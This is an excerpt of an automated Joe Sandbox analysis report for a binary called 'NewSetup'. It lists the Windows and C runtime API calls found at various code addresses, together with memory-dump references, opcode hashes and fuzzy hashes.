                                                                                                      • API String ID: 1279760036-0
                                                                                                      APIs
                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0021990F
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0023138F
                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002313CD
                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002313E0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00231428
                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00231443
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                      • String ID: ,K$
                                                                                                      • API String ID: 415426439-3784840329
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: __floor_pentium4
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AA0
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,002313BD,00000002,00000000,?,?,?,002313BD,?,00000000), ref: 00231AC9
                                                                                                      • GetACP.KERNEL32(?,?,002313BD,?,00000000), ref: 00231ADE
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID: ACP$OCP
                                                                                                      • API String ID: 2299586839-711371036
                                                                                                      APIs
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID:
                                                                                                      • API String ID: 1974802433-0
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021F8F5
                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0021F9C1
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021F9DA
                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0021F9E4
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 254469556-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002315D4
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0023161E
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002316E4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 661929714-0
                                                                                                      • Opcode ID: 25e6a69a1df5b5e9afc18e4ed5ba1f473964f47ea66419efae0a54f935322ba5
                                                                                                      • Instruction ID: 5b03b49360cdb06800ddaaa29e4b3632622eca9afee0ebccc1d16c83e5772cc9
                                                                                                      • Opcode Fuzzy Hash: 25e6a69a1df5b5e9afc18e4ed5ba1f473964f47ea66419efae0a54f935322ba5
                                                                                                      • Instruction Fuzzy Hash: AD61D3B15202179FDB289F64DC82BBAB3A8EF05700F28817AED05C6285E774D9B1CF50
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00227F28
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00227F32
                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00227F3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                      • String ID:
                                                                                                      • API String ID: 3906539128-0
                                                                                                      • Opcode ID: d8238e58ab2cec41af8983a7323540d3337842f72890db51bcfa704cabd4b861
                                                                                                      • Instruction ID: 1bda85965df263d4871b545387a48f584110f64a901fb0ca0171fe5af0d7e875
                                                                                                      • Opcode Fuzzy Hash: d8238e58ab2cec41af8983a7323540d3337842f72890db51bcfa704cabd4b861
                                                                                                      • Instruction Fuzzy Hash: DD31D274911229ABCB21DF64ED887CDBBB8BF18310F5042EAE41CA7290E7709F958F45
                                                                                                      APIs
                                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32 ref: 002200EC
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,456001D6,00218E30,?,0023BE77,000000FF,?,0021FDB4,?,00000000,00000000,?,0021FDD8,?,00218E30,?), ref: 002200F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$FileSystem$Precise
                                                                                                      • String ID:
                                                                                                      • API String ID: 743729956-0
                                                                                                      • Opcode ID: 88b76494bcf822b25fad04837d2dbb10c7b2638f5b52f2bbf91ac49e3b19fc8a
                                                                                                      • Instruction ID: 76fdc37d4b45322c0193312c69d1e12a1f6892df217d27673afef78c698f0275
                                                                                                      • Opcode Fuzzy Hash: 88b76494bcf822b25fad04837d2dbb10c7b2638f5b52f2bbf91ac49e3b19fc8a
                                                                                                      • Instruction Fuzzy Hash: 0DF0E536A44664EFCB028F48EC48F5EB7A8F70AB14F01012AEC0293790CF74A900DB80
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: (="$0
                                                                                                      • API String ID: 0-3643469856
                                                                                                      • Opcode ID: 51028673bfcbc76e5d970baa14f3a0408980f990aa235931a3d4e5a395116e54
                                                                                                      • Instruction ID: 8313f79afbefb62746cfc66ce7b985912807bc09ff9714f2f847a559958725d5
                                                                                                      • Opcode Fuzzy Hash: 51028673bfcbc76e5d970baa14f3a0408980f990aa235931a3d4e5a395116e54
                                                                                                      • Instruction Fuzzy Hash: 74B12930920637ABCB28EFE8E5556BE7BB1AF04300F14061EEA5697640C775EEB1CB51
                                                                                                      APIs
                                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00235BB9,?,?,00000008,?,?,0023BCAB,00000000), ref: 00235E8B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionRaise
                                                                                                      • String ID:
                                                                                                      • API String ID: 3997070919-0
                                                                                                      • Opcode ID: f9cbe12ec94f626a9729335191d2d0ecd45748bc90285cd99f5cd94dde99b3f2
                                                                                                      • Instruction ID: a2715614fbd9895a9b86c9e681603d7c443825d97077940a8f1e195b37ca0cf6
                                                                                                      • Opcode Fuzzy Hash: f9cbe12ec94f626a9729335191d2d0ecd45748bc90285cd99f5cd94dde99b3f2
                                                                                                      • Instruction Fuzzy Hash: 10B170B1620A19DFD715CF28C48AB657BE0FF45364F298658E89DCF2A1C335D9A1CB40
                                                                                                      APIs
                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0021F56B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                      • String ID:
                                                                                                      • API String ID: 2325560087-0
                                                                                                      • Opcode ID: 6e08a618209ddacac3f6ab3a96559bdffe2e9f451d21c916d68213b7c8d1b0a5
                                                                                                      • Instruction ID: 3e196c2f56c8a0bd1b71889499d70a8b7b3ea6c9da74db7bd0a1efde7b8f2eb9
                                                                                                      • Opcode Fuzzy Hash: 6e08a618209ddacac3f6ab3a96559bdffe2e9f451d21c916d68213b7c8d1b0a5
                                                                                                      • Instruction Fuzzy Hash: 84A1B076E112058FDB59CF68E889799BBF4FB59320F25822AD421EB364C374D880CF50
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022D2B4: HeapAlloc.KERNEL32(00000008,?,?,?,0022C1B7,00000001,00000364,?,00000006,000000FF,?,00225495,00248E38,0000000C), ref: 0022D2F5
                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002320D9
                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002321CD
                                                                                                      • FindClose.KERNEL32(00000000), ref: 0023220C
                                                                                                      • FindClose.KERNEL32(00000000), ref: 0023223F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                      • String ID:
                                                                                                      • API String ID: 2701053895-0
                                                                                                      • Opcode ID: 6706de161c113103a40b47c15ba4f243d7d0f4235df2171f64b2093d4e16f2db
                                                                                                      • Instruction ID: 91218d6e5401488f662ebfc00c1af9e81ae75bf85301a630b7355da18beb583a
                                                                                                      • Opcode Fuzzy Hash: 6706de161c113103a40b47c15ba4f243d7d0f4235df2171f64b2093d4e16f2db
                                                                                                      • Instruction Fuzzy Hash: 695176F592421AAFDF249F789C85AFEB7B9DF45304F144199F84893201EB308D6A9F20
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00231894
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      • Opcode ID: 9b74feb06f409f2c7ae2c062146637f8547bb530f69f57bc8ca2a6342bc80178
                                                                                                      • Instruction ID: 9f0ce85bc90e1a02dd78e10035180f3fbb2677be385030dc00fb48d1c5f86893
                                                                                                      • Opcode Fuzzy Hash: 9b74feb06f409f2c7ae2c062146637f8547bb530f69f57bc8ca2a6342bc80178
                                                                                                      • Instruction Fuzzy Hash: 0D21D6B2620217ABEB18AF25EC41ABA73A8EF04710F20407AFD02C6141EB34DD708B54
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231580,00000001,00000000,?,-00000050,?,00231363,00000000,-00000002,00000000,?,00000055,?), ref: 0023154A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2121053574.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2121037786.0000000000210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121080104.000000000023D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121098016.000000000024A000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121114195.000000000024B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121129804.000000000024F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121146102.0000000000252000.00000008.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2121184095.000000000029E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002319B4
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0023179C,00000000,00000000,?), ref: 00231B39
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 3736152602-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231840,00000001,?,?,-00000050,?,0023132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0023181D
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 002280E1: EnterCriticalSection.KERNEL32(?,?,0022C5F8,?,00249290,00000008,0022C4EA,?,?,?), ref: 002280F0
                                                                                                      • EnumSystemLocalesW.KERNEL32(0022D1B0,00000001,00249310,0000000C,0022CB11,-00000050), ref: 0022D1F5
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1272433827-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0022C16A: GetLastError.KERNEL32(?,?,00225495,00248E38,0000000C), ref: 0022C16E
                                                                                                        • Part of subcall function 0022C16A: SetLastError.KERNEL32(00000000), ref: 0022C210
                                                                                                      • EnumSystemLocalesW.KERNEL32(00231960,00000001,?,?,?,00231385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0023194C
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 2417226690-0
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00226E33,?,20001004,00000000,00000002,?,?,00225D3D), ref: 0022CC49
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: InfoLocale
                                                                                                      • String ID:
                                                                                                      • API String ID: 2299586839-0
                                                                                                      APIs
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 0021F8E2
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                      • String ID:
                                                                                                      • API String ID: 3192549508-0
                                                                                                      APIs
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_210000_NewSetup.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: 3676ca76f9d73775f3fd0f082b83ea42674adced5c4e2d7f067894623c8157a9
• Instruction ID: 5311eeb4277a4e4543d8bc578373c093b0260da4e5a0a45fa7cc8a7c40a8b604
• Opcode Fuzzy Hash: 3676ca76f9d73775f3fd0f082b83ea42674adced5c4e2d7f067894623c8157a9
• Instruction Fuzzy Hash: 9FA011382002028F83008F32BA0C2083AA8AA03AC0300802AA802C20A0EA308008AF02
APIs
• GetCPInfo.KERNEL32(03005EA0,03005EA0,00000000,7FFFFFFF,?,0023AACD,03005EA0,03005EA0,00000000,03005EA0,?,?,?,?,03005EA0,00000000), ref: 0023AB88
• __alloca_probe_16.LIBCMT ref: 0023AC43
• __alloca_probe_16.LIBCMT ref: 0023ACD2
• __freea.LIBCMT ref: 0023AD1D
• __freea.LIBCMT ref: 0023AD23
• __freea.LIBCMT ref: 0023AD59
• __freea.LIBCMT ref: 0023AD5F
• __freea.LIBCMT ref: 0023AD6F
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
• Instruction ID: 7a5cefb00a04c6fd042b37d37fa4525399ef89b1fee7b6926023e32c171cd005
• Opcode Fuzzy Hash: e0b3d2d27e173046c6de87382c7fef21ec97912d1f08c6bdacc1799ccf0b37cc
• Instruction Fuzzy Hash: DE71E7B2A2020A6BDF219E648C41FEFB7BADF55314F290466F884A7191E775CC60CB52
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0021FE70
• __alloca_probe_16.LIBCMT ref: 0021FE9C
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0021FEDB
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0021FEF8
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0021FF37
• __alloca_probe_16.LIBCMT ref: 0021FF54
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0021FF96
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0021FFB9
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
• Instruction ID: fa9bf74597e8a0d97f2f4ec13a97494f83cdabb9b4c2c301b2e3505502742382
• Opcode Fuzzy Hash: 91eff6058527918cd29c689d7e4ed7930ffdc23d1b42afed78fcffce93657c5c
• Instruction Fuzzy Hash: E251A07262021AAFEB604F60CD49FEA7BE8EF62750F154435F924DA590D7B18CA18B50
APIs
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction ID: 9500c5a6f05806044f6abd7b3a729b789b69422ca0e892039e2977a19dc507d9
• Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
• Instruction Fuzzy Hash: 2FB13772A20366BFDF218FA4DD41BAE7BB5EF15310F154175E844AF282D2749D21CBA0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00220D77
• ___except_validate_context_record.LIBVCRUNTIME ref: 00220D7F
• _ValidateLocalCookies.LIBCMT ref: 00220E08
• __IsNonwritableInCurrentImage.LIBCMT ref: 00220E33
• _ValidateLocalCookies.LIBCMT ref: 00220E88
Strings
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: d0aeec00e5d43686bf68b8ea2ba534efb51acbe42c73d91e0430398be8dc0bba
• Instruction ID: 4d3318316a1b0e04de3c09c4cd12206ca94ada09b2067e026e4591d499587d5d
• Opcode Fuzzy Hash: d0aeec00e5d43686bf68b8ea2ba534efb51acbe42c73d91e0430398be8dc0bba
• Instruction Fuzzy Hash: 4B41F230A20229BBCF11DFA8E884A9EBBA6EF05314F158455E8146B393C731AD61CF90
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00213CA5
• std::_Lockit::_Lockit.LIBCPMT ref: 00213CBF
• std::_Lockit::~_Lockit.LIBCPMT ref: 00213CE0
• __Getctype.LIBCPMT ref: 00213D92
• std::_Lockit::~_Lockit.LIBCPMT ref: 00213DD8
Strings
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
• String ID: e.$
• API String ID: 3087743877-2253995300
